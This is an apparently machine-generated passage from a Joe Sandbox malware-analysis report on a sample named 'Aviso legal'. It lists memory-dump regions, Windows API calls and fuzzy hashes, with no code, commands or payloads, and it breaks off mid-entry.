                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 395D7462
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6071955437.00000000395D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 395D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_395d0000_Aviso legal.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: 1399191d834b0f312b37d84b7830432653fe7c151cc848db4d68b13c49cdecfe
                                • Instruction ID: d75725902fd195ffd1fd82938abd934c79b346c384e9877dae934c7fb1a2f2a3
                                • Opcode Fuzzy Hash: 1399191d834b0f312b37d84b7830432653fe7c151cc848db4d68b13c49cdecfe
                                • Instruction Fuzzy Hash: DC41C3B5D003499FDB15CF99C884ADEBFB5BF48350F60852AE418AB250D771A985CF90
                                APIs
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6044305915.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_160000_Aviso legal.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID:
                                • API String ID: 1029625771-0
                                • Opcode ID: cd066097bbec6c3575502e6fcd9c32133e09621cd5e3dc73200db927fba2fe21
                                • Instruction ID: 50071899eca321ea273fc77d2bf5f58b27e3f3bbc7bf5a30b8879297ac5859ba
                                • Opcode Fuzzy Hash: cd066097bbec6c3575502e6fcd9c32133e09621cd5e3dc73200db927fba2fe21
                                • Instruction Fuzzy Hash: E44169B0D006498FDB10CFA9C88579EFBF1EF48300F14862AE855A7385DB759886CF91
                                APIs
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6044305915.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_160000_Aviso legal.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID:
                                • API String ID: 1029625771-0
                                • Opcode ID: eee96187942f5d1be38a47bc2494bcb2becd480ae0f3f3fb1d8ae75daccf43e3
                                • Instruction ID: a54b3acf099c4ef304591edc758ee3bc59d31c5aab398bb59663663444b8cd19
                                • Opcode Fuzzy Hash: eee96187942f5d1be38a47bc2494bcb2becd480ae0f3f3fb1d8ae75daccf43e3
                                • Instruction Fuzzy Hash: CF4157B0D006488FDB10CFA9C88579EFBF1EB48304F148629E815AB385DB759855CF91
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 3930CF07
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6071785187.0000000039300000.00000040.00000800.00020000.00000000.sdmp, Offset: 39300000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_39300000_Aviso legal.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: a603554af289d50e87c47818a61566bbbeac5f3fa0890852e04360d6bd9916bd
                                • Instruction ID: 521503f6247406150756e5e131f35cf4fdb73c409bf125fcd1f730d711eecb32
                                • Opcode Fuzzy Hash: a603554af289d50e87c47818a61566bbbeac5f3fa0890852e04360d6bd9916bd
                                • Instruction Fuzzy Hash: 142105B5900349AFDB00CFAAD884ADEBFF8EF48310F24841AE814A7351D374A944CFA5
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 3930CF07
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6071785187.0000000039300000.00000040.00000800.00020000.00000000.sdmp, Offset: 39300000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_39300000_Aviso legal.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 41083e43cc57bcb07a4764c03886e368ec00f6a5636f062c8f4e9d32798a708d
                                • Instruction ID: e8e00a7205029941b5381b3d61ecea262a1ea958c56d583dcab77654637613ac
                                • Opcode Fuzzy Hash: 41083e43cc57bcb07a4764c03886e368ec00f6a5636f062c8f4e9d32798a708d
                                • Instruction Fuzzy Hash: 1E21D5B59002499FDB10CFAAD984ADEFBF8FF48310F24841AE915A7350D374A954CFA5
                                APIs
                                • FindWindowW.USER32(00000000,00000000), ref: 395D2256
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6071955437.00000000395D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 395D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_395d0000_Aviso legal.jbxd
                                Similarity
                                • API ID: FindWindow
                                • String ID:
                                • API String ID: 134000473-0
                                • Opcode ID: 38c36613203d4e92e3183d352d6a8c4d777ebca2134fee91b6533796b63248ac
                                • Instruction ID: 23f985052178422a772292eb5319ae74ac361e71c1d9da3edd07d125421de173
                                • Opcode Fuzzy Hash: 38c36613203d4e92e3183d352d6a8c4d777ebca2134fee91b6533796b63248ac
                                • Instruction Fuzzy Hash: 632110B58003098FDB00DF9AD884B9EFBF4BB49310F50852EE419B7200C375A985CBA1
                                APIs
                                • FindWindowW.USER32(00000000,00000000), ref: 395D2256
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6071955437.00000000395D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 395D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_395d0000_Aviso legal.jbxd
                                Similarity
                                • API ID: FindWindow
                                • String ID:
                                • API String ID: 134000473-0
                                • Opcode ID: f90036af5251cc59509dcb6446f358811ad4a3fa78baf57bbe87a3bf7561358c
                                • Instruction ID: cba473500e4655073a009dd64bdb0225f2b08b280556f42fee38059022e05bfc
                                • Opcode Fuzzy Hash: f90036af5251cc59509dcb6446f358811ad4a3fa78baf57bbe87a3bf7561358c
                                • Instruction Fuzzy Hash: A82110B69012498EDB00DF9AD884BDEFBB5BF89310F60852ED419B7200C375A985CBA1
                                APIs
                                • OleInitialize.OLE32(00000000), ref: 395DC15D
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6071955437.00000000395D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 395D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_395d0000_Aviso legal.jbxd
                                Similarity
                                • API ID: Initialize
                                • String ID:
                                • API String ID: 2538663250-0
                                • Opcode ID: ec2c6e5f3e4d7632a77cc48907888bc6dd83d4816a6f4849b889e18b105f4199
                                • Instruction ID: 049b834e2a75da23f0a5228a436c11b9c1dd4a760145793e9ef05c7f7c1cdf1d
                                • Opcode Fuzzy Hash: ec2c6e5f3e4d7632a77cc48907888bc6dd83d4816a6f4849b889e18b105f4199
                                • Instruction Fuzzy Hash: F31118B5900359CFDB10DFA9D485BDEFBF4AB48314F20841AD419A7340C375A944CFA5
                                APIs
                                • OleInitialize.OLE32(00000000), ref: 395DC15D
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6071955437.00000000395D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 395D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_395d0000_Aviso legal.jbxd
                                Similarity
                                • API ID: Initialize
                                • String ID:
                                • API String ID: 2538663250-0
                                • Opcode ID: 17d4ff5e14957b6f80850e0a2e3701a3aa48ec040c90e04923f421b31200494d
                                • Instruction ID: 113b8546ce67d0824bb987c46a433ad368e230849ae5daaefa27e5d54b21bb48
                                • Opcode Fuzzy Hash: 17d4ff5e14957b6f80850e0a2e3701a3aa48ec040c90e04923f421b31200494d
                                • Instruction Fuzzy Hash: 821115B59043898FDB10DFAAD484B9EFBF8EB48320F20841AD518B7340D374A984CFA5
                                APIs
                                • LdrInitializeThunk.NTDLL(?,00000000,?), ref: 001622BC
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6044305915.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_160000_Aviso legal.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 069c9103a5faf943a44b51681ee913400d69a72c3af9b41d48b42ba30776070c
                                • Instruction ID: 50affb8fcc2ca51aeb07c0a289899db04c3ce1d82ba94ea7665e37f2f9d8e686
                                • Opcode Fuzzy Hash: 069c9103a5faf943a44b51681ee913400d69a72c3af9b41d48b42ba30776070c
                                • Instruction Fuzzy Hash: 81F09631600B015BDB24AE9B9850657FAEAEFD5354B448A3ED109C3251DB70D90D8692
                                APIs
                                • LdrInitializeThunk.NTDLL(?,00000000,?), ref: 001622BC
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6044305915.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_160000_Aviso legal.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 1391216d398d8deb903ad71a6e33cb63b1e4a6e60dc573585e9b1e5300f9006c
                                • Instruction ID: 17642697affe4e97fcb58c4202efaa3e9263c8b23f275e3fe0b5f2bc7654d713
                                • Opcode Fuzzy Hash: 1391216d398d8deb903ad71a6e33cb63b1e4a6e60dc573585e9b1e5300f9006c
                                • Instruction Fuzzy Hash: 91F0B430700F0557CB24AF9B9CA0517FAEAEFC9310744CA3EE00D83211DB70D90986E6
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID: PH!r
                                • API String ID: 0-2790525237
                                • Opcode ID: b851a9339acdf3083b8277bde5570da125b346b9bc9077a9757c422fc3cfa219
                                • Instruction ID: 31ef9e071ee704599bc291d14876edf25560e18194ef71fa470b2bb19a04c12f
                                • Opcode Fuzzy Hash: b851a9339acdf3083b8277bde5570da125b346b9bc9077a9757c422fc3cfa219
                                • Instruction Fuzzy Hash: C941AC35F002198FEB05AB7594647AE7BA2AB89350F60893AC417EB390EF34DC4687D1
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID: (&!r
                                • API String ID: 0-1251370860
                                • Opcode ID: 472d6f71e1b76fb7a0ec18c84cb169de5d666517c01a9ab60ae0d044213a8adf
                                • Instruction ID: 957f4020dff8bf0be424a14c83226f7ff7a07006f8e131da67a1e49132aae2cb
                                • Opcode Fuzzy Hash: 472d6f71e1b76fb7a0ec18c84cb169de5d666517c01a9ab60ae0d044213a8adf
                                • Instruction Fuzzy Hash: 52414D31F002199BDB15DFB9C850ADEBBB2AF84710F148529E416BB280EF70AD46CBD1
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID: PH!r
                                • API String ID: 0-2790525237
                                • Opcode ID: e975cbe2a87024a95d9f9cb9cad8a4f6725a53973ce4f89476b6dc1955ea2f4c
                                • Instruction ID: b417e3818a4e8310579bb3d0ec8fbdb2c2dd100ce5cf4c17d5b81c594ce94ef1
                                • Opcode Fuzzy Hash: e975cbe2a87024a95d9f9cb9cad8a4f6725a53973ce4f89476b6dc1955ea2f4c
                                • Instruction Fuzzy Hash: 6D41DF34B002068FEB15AB75C86569F7BB3AB89240F644579D406DB395EF38DC42CBA1
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID: LR!r
                                • API String ID: 0-2905262004
                                • Opcode ID: cb2a45f5671df743975dca09da3fc4567d0f43aa8d6f647b56680ac5ce58afa1
                                • Instruction ID: ae10289eb96031964c4d65d32baaf393ac16c22d2ff456bf53a0923a92608618
                                • Opcode Fuzzy Hash: cb2a45f5671df743975dca09da3fc4567d0f43aa8d6f647b56680ac5ce58afa1
                                • Instruction Fuzzy Hash: AF31A475E10256DBEB04DFA9C45578EBBB2EF85341F218526F811F7280EB70A942CB50
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID: PH!r
                                • API String ID: 0-2790525237
                                • Opcode ID: 576bde9842ece5cc7be588cb24246107bf8ac88bf8b976faf538cd4f0e155bc3
                                • Instruction ID: 26b5d10f65420200acc1d5c6242e8d309bfc6f741a87b4121efb2dd43c6b09a8
                                • Opcode Fuzzy Hash: 576bde9842ece5cc7be588cb24246107bf8ac88bf8b976faf538cd4f0e155bc3
                                • Instruction Fuzzy Hash: 6C31DE31B042158FEB05AB70C4687AEBBA2AB89340F654929C453DB3A1DF34CC46CBD1
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID: 0U,6
                                • API String ID: 0-1301493201
                                • Opcode ID: 8e637e53d3336c6fe33fddeee559a252e931111fb001f9e448ad62c41de38ed8
                                • Instruction ID: 3d570dcc850686b1fb78f1f924880fde06f8448f76ee70ae4aa943c3adb90c26
                                • Opcode Fuzzy Hash: 8e637e53d3336c6fe33fddeee559a252e931111fb001f9e448ad62c41de38ed8
                                • Instruction Fuzzy Hash: AB315B34E102499BDB18DF65C894A9FBBF2EF89304F108569E906F7380DB74AC46CB90
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID: LR!r
                                • API String ID: 0-2905262004
                                • Opcode ID: 2054461f1285196140771fa7ffa361a47f5b37615d7196ebec419056401d6928
                                • Instruction ID: 07afcfcb8d53d4cdabbec2fa16745fd1c08bb77438c500d9325511afd9a94180
                                • Opcode Fuzzy Hash: 2054461f1285196140771fa7ffa361a47f5b37615d7196ebec419056401d6928
                                • Instruction Fuzzy Hash: D731B535E202169BEB04CF69C45578EB7B2EF85341F21852AF811FB280EB75ED42CB54
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID: 0U,6
                                • API String ID: 0-1301493201
                                • Opcode ID: 6a88c2dc8daabff5479c8ad76821d37a8010b6688f223ac7270a18df808109d3
                                • Instruction ID: b556febe5edee129b7e07f1b57004559feb09c0250ace17fc867db06dc5da449
                                • Opcode Fuzzy Hash: 6a88c2dc8daabff5479c8ad76821d37a8010b6688f223ac7270a18df808109d3
                                • Instruction Fuzzy Hash: 41314B34E102499FDB18DF65C494A9FBBF2EF89304F208529E906E7380DB70AC46CB90
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9db73d5b866198a17b26ed799c079de90dda19d0cc628fc6df5cde642cbab66f
                                • Instruction ID: b647ea003f98b2a276e6d88d639b51b53ce4743063d7dc7e96e972fe6ab07a24
                                • Opcode Fuzzy Hash: 9db73d5b866198a17b26ed799c079de90dda19d0cc628fc6df5cde642cbab66f
                                • Instruction Fuzzy Hash: C0E18038F102499FEB14DB69C594A5EBBF2EB88350F20847AE406E7395DB34DD42CB81
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 09c49d8ebafcbdd9f2324f0fb87a69b40f12fc550488a20867b949033bab70c1
                                • Instruction ID: beace0cf12a07d34c97af310708b24895d655fb32a0eb3916b00285b37abacc9
                                • Opcode Fuzzy Hash: 09c49d8ebafcbdd9f2324f0fb87a69b40f12fc550488a20867b949033bab70c1
                                • Instruction Fuzzy Hash: 68813C74F106098FDB04DFA9C45479EBBF2AB89314F20852AD40AEB395EB74DC428B95
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b04cd0abf46a67f40fc7237cb7a909e5a51c63e817952bff481c626419e446f0
                                • Instruction ID: aa049dba880b3abaa262d1553a5a0fc059feab481c09ea32fa6a6a8ba2898b4e
                                • Opcode Fuzzy Hash: b04cd0abf46a67f40fc7237cb7a909e5a51c63e817952bff481c626419e446f0
                                • Instruction Fuzzy Hash: C0816E75A002048FDB54DF69D884B9DBBB6FF88310F54C16AE908AB399EB70D945CB90
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 366bce4fcfdf238c048157da887b8c0d9e065ee73a4aa5940ec5f30915fbf36c
                                • Instruction ID: 627c50190dfd702e538f76b6f0a3b78b17affa2fb2002808341076cdad1902f2
                                • Opcode Fuzzy Hash: 366bce4fcfdf238c048157da887b8c0d9e065ee73a4aa5940ec5f30915fbf36c
                                • Instruction Fuzzy Hash: 3B913234E106198BEB20DF68C85078DB7B1FF89310F2085A5D559AB385DB71AE85CF51
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 08f361cf1919a08b3ccfde8b55506dc015d0b33fa1caf494020708fde624f3a5
                                • Instruction ID: ef0a531c92d4c1c994d3a6cd9a3cf631918232a0b6bfd4f3fc8b707acf529060
                                • Opcode Fuzzy Hash: 08f361cf1919a08b3ccfde8b55506dc015d0b33fa1caf494020708fde624f3a5
                                • Instruction Fuzzy Hash: B0913034E106198BEB20DF68C850B8DB7B1FF89310F2085A5D559BB385DB70AE85CF91
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9967a7f6351be4e46899cccd479882afcf1b2bff6c715a6d69b3ef70359dd4f7
                                • Instruction ID: 9409790f2c8b11741908c3c3c0565c2e735a29735e7570ab6571bc78919facb7
                                • Opcode Fuzzy Hash: 9967a7f6351be4e46899cccd479882afcf1b2bff6c715a6d69b3ef70359dd4f7
                                • Instruction Fuzzy Hash: 8C414B75E006098BEB30CFE9D880B9FBBB2FB84250F20493AD156D7650D731A9598B91
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 05121605931c4225c9feeaa95b635630dcc26d24408f28d580dec094ecc5d983
                                • Instruction ID: 381c1e6201d7770c24da5d70f77ca4e9f8bc949da7ac4a0b344b2597f539850d
                                • Opcode Fuzzy Hash: 05121605931c4225c9feeaa95b635630dcc26d24408f28d580dec094ecc5d983
                                • Instruction Fuzzy Hash: 6741F834A10218CFEB04DB69C958A9E7BB5BF8C745F614469E402EB3A1DF79DC41CBA0
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: da323c71c20579b8c21d6916eb7efdeec93c5dc7555aa4581ae67dff8c1f900f
                                • Instruction ID: b7753627eb4eb8a381cba6fa9481d80f554332a56372ecf421dc438231ea29f0
                                • Opcode Fuzzy Hash: da323c71c20579b8c21d6916eb7efdeec93c5dc7555aa4581ae67dff8c1f900f
                                • Instruction Fuzzy Hash: FA315671F002095FEB249BADCC91B9FBBA6EBC8750F248529E115EB3C5DA71DC0187A4
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1bff95109edbbab29e754609db144262868fc1d6ebecee7c4e291b0ba51d0fbf
                                • Instruction ID: 4fea133c97574b48243ddcd9af3be852af9a0178b924c20f59e6e7670d5774a0
                                • Opcode Fuzzy Hash: 1bff95109edbbab29e754609db144262868fc1d6ebecee7c4e291b0ba51d0fbf
                                • Instruction Fuzzy Hash: CB314471F002095BEB249BADCC51B9FBAA6EBC8760F248529E115EB3C5DA719C018794
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 57070dd49b83ffe019cd5459fe81adbeb4d1c41c1c32f81d7a3c41190c7d78a7
                                • Instruction ID: 811a95b4586a220b35b145f9c0827366fb5581130aa660ae216a5ae7134a81fd
                                • Opcode Fuzzy Hash: 57070dd49b83ffe019cd5459fe81adbeb4d1c41c1c32f81d7a3c41190c7d78a7
                                • Instruction Fuzzy Hash: 8B413A38B10214CFDB04DB69C559A997BF5AF4C749F6144A9E402EB3A2CF79EC41CB90
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1a139fe29a957575618adabee1522a0d457ad2d9cdd20c3a3a1e2a6852f1fa69
                                • Instruction ID: e805c411cd5579b82b1539ed8eb2bdc0156a85fbc6222aa6afe59ee75b807685
                                • Opcode Fuzzy Hash: 1a139fe29a957575618adabee1522a0d457ad2d9cdd20c3a3a1e2a6852f1fa69
                                • Instruction Fuzzy Hash: 0F31C335E1025A9BDB05DFB4C85568EFBB2FF89300F20C52AE805BB245DB71E846CB91
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a760fe39ffd965708bab0b34cea56917a47c6fd299157dbf360383a1ccdddee8
                                • Instruction ID: bfda01b81c04a5675bd6752cc35a16cf8c17a5c7003a46d68c30cdf66432d715
                                • Opcode Fuzzy Hash: a760fe39ffd965708bab0b34cea56917a47c6fd299157dbf360383a1ccdddee8
                                • Instruction Fuzzy Hash: 60219279F502149FDB00CFA9C841A9E7FF5EB48710F144436E945E7390EB34D9468B94
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4606e7c41e55b61e0ee7dd2b2f0e2aa3100635a3cb8ab210349dcdb8ed6adec3
                                • Instruction ID: c9cc36d5e39fc25178b36f09df0d5a1ee7778ba0e736b37c09db8b1f6cccb703
                                • Opcode Fuzzy Hash: 4606e7c41e55b61e0ee7dd2b2f0e2aa3100635a3cb8ab210349dcdb8ed6adec3
                                • Instruction Fuzzy Hash: 82216079F506159FDB00CFA9C841A9EBBF5EB48710F104436E905E7390EB34E9428B94
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 47d56dbfca8905c8f6c5386652f19340242fd5cf8083df6b4e774fa9859f2417
                                • Instruction ID: 4461b76fef80ac5fd0d2872a2826e6977fe10a3f3ad899fdedcdbe0f18396aa7
                                • Opcode Fuzzy Hash: 47d56dbfca8905c8f6c5386652f19340242fd5cf8083df6b4e774fa9859f2417
                                • Instruction Fuzzy Hash: C0217134E1025A9BDB05DFA5D85568EFBB2FF89300F20C52AE805BB245DB71E846CB90
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 09f65164a1cdf65cb94b95ff3c479c8f3290b26d9040633a92ca1d08858e4250
                                • Instruction ID: 0305dfbc3363c931ae9bea102c8edee49315a31115d03baab83ea457fa990e71
                                • Opcode Fuzzy Hash: 09f65164a1cdf65cb94b95ff3c479c8f3290b26d9040633a92ca1d08858e4250
                                • Instruction Fuzzy Hash: 2521D071E013189FDB159B69DC916CEBBF6AB8A300F5084BAE009EB241DA359944CBD1
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 956496d6b0d1c6418a079270f090b220d95899c8dd98c2d11e32ad72a69ea7b1
                                • Instruction ID: 85f870fe110665594c771a0afc60176994387fe92e4dd7d18548350a783d0555
                                • Opcode Fuzzy Hash: 956496d6b0d1c6418a079270f090b220d95899c8dd98c2d11e32ad72a69ea7b1
                                • Instruction Fuzzy Hash: 68217431E102199FDB05DF64D84068EBBB2AF89340F20862AEC15F7384DB719846CB90
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6042583062.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_ad000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7e52a47a8ee73690d21a9eb440852536d81f496b537cd937451dd0039a95227f
                                • Instruction ID: d02e5e842d398de43e3f34f89143e9a0b2f4070083a934e7e407f79793dbe30b
                                • Opcode Fuzzy Hash: 7e52a47a8ee73690d21a9eb440852536d81f496b537cd937451dd0039a95227f
                                • Instruction Fuzzy Hash: B02107B5504340EFDB20DF94D9C0F16BBA6EB85314F34C56AD84A4F646C376D846CB62
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID:
